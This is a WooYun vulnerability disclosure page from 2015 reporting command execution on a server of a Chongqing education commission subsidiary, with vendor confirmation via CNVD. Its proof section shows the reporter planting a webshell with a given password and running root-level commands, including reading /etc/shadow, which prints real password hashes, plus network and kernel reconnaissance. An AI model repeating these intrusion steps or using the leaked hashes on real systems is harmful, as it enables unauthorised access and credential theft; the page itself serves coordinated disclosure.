当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0163500

漏洞标题:重庆市教育委员会某下属单位服务器getshell

相关厂商:重庆市教育委员会

漏洞作者: 朱元璋

提交时间:2015-12-23 16:32

修复时间:2016-02-09 23:29

公开时间:2016-02-09 23:29

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-12-23: 细节已通知厂商并且等待厂商处理中
2015-12-27: 厂商已经确认,细节仅向厂商公开
2016-01-06: 细节向核心白帽子及相关领域专家公开
2016-01-16: 细节向普通白帽子公开
2016-01-26: 细节向实习白帽子公开
2016-02-09: 细节向公众公开

简要描述:

详细说明:

0.png

00.png


地址http://**.**.**.**/portal/portal!index.action存在命令执行漏洞

000.png


直接上传木马到服务器中

1.jpg


http://**.**.**.**/bak.jsp密码test

漏洞证明:

[/opt/tomcat-8082/webapps/rsnp_ky/]$ chkconfig --list
/bin/sh: chkconfig: not found
[/opt/tomcat-8082/webapps/rsnp_ky/]$ cat /etc/shadow
root:$1$2gCF5FFx$iomgw1okBGGmKKieQf3PE1:16155:0:99999:7:::
daemon:*:16155:0:99999:7:::
bin:*:16155:0:99999:7:::
sys:*:16155:0:99999:7:::
sync:*:16155:0:99999:7:::
games:*:16155:0:99999:7:::
man:*:16155:0:99999:7:::
lp:*:16155:0:99999:7:::
mail:*:16155:0:99999:7:::
news:*:16155:0:99999:7:::
uucp:*:16155:0:99999:7:::
proxy:*:16155:0:99999:7:::
www-data:*:16155:0:99999:7:::
backup:*:16155:0:99999:7:::
list:*:16155:0:99999:7:::
irc:*:16155:0:99999:7:::
gnats:*:16155:0:99999:7:::
nobody:*:16155:0:99999:7:::
libuuid:!:16155:0:99999:7:::
dhcp:*:16155:0:99999:7:::
syslog:*:16155:0:99999:7:::
klog:*:16155:0:99999:7:::
sshd:*:16155:0:99999:7:::
cquc:$1$bjn/GZkA$zCYflysSOxyLRH/kx5UDP/:16155:0:99999:7:::
[/opt/tomcat-8082/webapps/rsnp_ky/]$ ifconfig
eth0      Link encap:Ethernet  HWaddr 00:17:a4:77:24:08  
          inet addr:**.**.**.**  Bcast:**.**.**.**  Mask:**.**.**.**
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:49082978 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16249573 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:5387694743 (5.0 GB)  TX bytes:11320919129 (10.5 GB)
          Interrupt:16 Memory:f6000000-f6012100 
lo        Link encap:Local Loopback  
          inet addr:**.**.**.**  Mask:**.**.**.**
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:18530 errors:0 dropped:0 overruns:0 frame:0
          TX packets:18530 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1567194 (1.4 MB)  TX bytes:1567194 (1.4 MB)
[/opt/tomcat-8082/webapps/rsnp_ky/]$ cat /etc/resolv.conf
nameserver **.**.**.** 
[/opt/tomcat-8082/webapps/rsnp_ky/]$ bash prompt:
bash: prompt:: No such file or directory
[/opt/tomcat-8082/webapps/rsnp_ky/]$ lsb_release -a
Distributor ID:	Ubuntu
Description:	Ubuntu 8.04.4 LTS
Release:	8.04
Codename:	hardy
No LSB modules are available.
[/opt/tomcat-8082/webapps/rsnp_ky/]$ arp -a
? (**.**.**.**) at 00:17:A4:77:24:24 [ether] on eth0
? (**.**.**.**) at 00:00:5E:00:01:01 [ether] on eth0
? (**.**.**.**) at 00:00:5E:00:01:01 [ether] on eth0
[/opt/tomcat-8082/webapps/rsnp_ky/]$ route
Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
**.**.**.**       *               **.**.**.**   U     0      0        0 eth0
default         **.**.**.**       **.**.**.**         UG    100    0        0 eth0
[/opt/tomcat-8082/webapps/rsnp_ky/]$ netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       Timer
tcp        0      0 **.**.**.**:8015          **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:8081            **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:8082            **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:8019            **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:22              **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:8025          **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:8029            **.**.**.**:*               LISTEN      off (0.00/0/0)
tcp        0      0 **.**.**.**:8081        **.**.**.**:52780         TIME_WAIT   timewait (54.30/0/0)
tcp        0      0 **.**.**.**:8081        **.**.**.**:27869         TIME_WAIT   timewait (44.30/0/0)
tcp        0      0 **.**.**.**:60279       **.**.**.**:1521        ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:8082        **.**.**.**:15473         ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:8081        **.**.**.**:24055         TIME_WAIT   timewait (34.29/0/0)
tcp        0      0 **.**.**.**:8081        **.**.**.**:21063         TIME_WAIT   timewait (49.29/0/0)
tcp        0      0 **.**.**.**:34780       **.**.**.**:1521        ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:48850       **.**.**.**:1521        ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:46712       **.**.**.**:1521        ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:41825       **.**.**.**:1521        ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:8081        **.**.**.**:50083         TIME_WAIT   timewait (9.28/0/0)
tcp        0      0 **.**.**.**:8081        **.**.**.**:15923         TIME_WAIT   timewait (59.28/0/0)
tcp        0      0 **.**.**.**:8081        **.**.**.**:62757         TIME_WAIT   timewait (19.27/0/0)
tcp        0      0 **.**.**.**:8081        **.**.**.**:54882         TIME_WAIT   timewait (14.27/0/0)
tcp        0      0 **.**.**.**:8081        **.**.**.**:37332         TIME_WAIT   timewait (29.27/0/0)
tcp        0      0 **.**.**.**:46567       **.**.**.**:1521        ESTABLISHED off (0.00/0/0)
tcp        0      0 **.**.**.**:8081        **.**.**.**:60739         TIME_WAIT   timewait (39.27/0/0)
tcp        0      0 **.**.**.**:8081        **.**.**.**:62850         TIME_WAIT   timewait (24.27/0/0)
raw    79600      0 **.**.**.**:1               **.**.**.**:*               7           off (0.00/0/0)
raw    79600      0 **.**.**.**:1               **.**.**.**:*               7           off (0.00/0/0)
raw    79600      0 **.**.**.**:1               **.**.**.**:*               7           off (0.00/0/0)
raw    79600      0 **.**.**.**:1               **.**.**.**:*               7           off (0.00/0/0)
raw    80576      0 **.**.**.**:1               **.**.**.**:*               7           off (0.00/0/0)
raw    80576      0 **.**.**.**:1               **.**.**.**:*               7           off (0.00/0/0)
raw    80576      0 **.**.**.**:1               **.**.**.**:*               7           off (0.00/0/0)
raw    80576      0 **.**.**.**:1               **.**.**.**:*               7           off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags       Type       State         I-Node   Path
unix  2      [ ]         DGRAM                    6194     @/com/ubuntu/upstart
unix  2      [ ]         DGRAM                    6384     @/org/kernel/udev/udevd
unix  3      [ ]         DGRAM                    11249    /dev/log
unix  2      [ ]         DGRAM                    11299    
[/opt/tomcat-8082/webapps/rsnp_ky/]$ whoami
root
[/opt/tomcat-8082/webapps/rsnp_ky/]$ lsb_release -a
Distributor ID:	Ubuntu
Description:	Ubuntu 8.04.4 LTS
Release:	8.04
Codename:	hardy
No LSB modules are available.
[/opt/tomcat-8082/webapps/rsnp_ky/]$ cat /etc/issue
Ubuntu 8.04.4 LTS \n \l
[/opt/tomcat-8082/webapps/rsnp_ky/]$ file /sbin/init
/sbin/init: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), for GNU/Linux 2.6.8, dynamically linked (uses shared libs), stripped
[/opt/tomcat-8082/webapps/rsnp_ky/]$ cat /proc/version
Linux version 2.6.24-26-server (buildd@crested) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu3)) #1 SMP Tue Dec 1 18:26:43 UTC 2009
[/opt/tomcat-8082/webapps/rsnp_ky/]$

修复方案:

加强安全意识

版权声明:转载请注明来源 朱元璋@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-12-27 22:04

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给重庆分中心,由其后续协调网站管理单位处置。

最新状态:

暂无

漏洞评价:

评价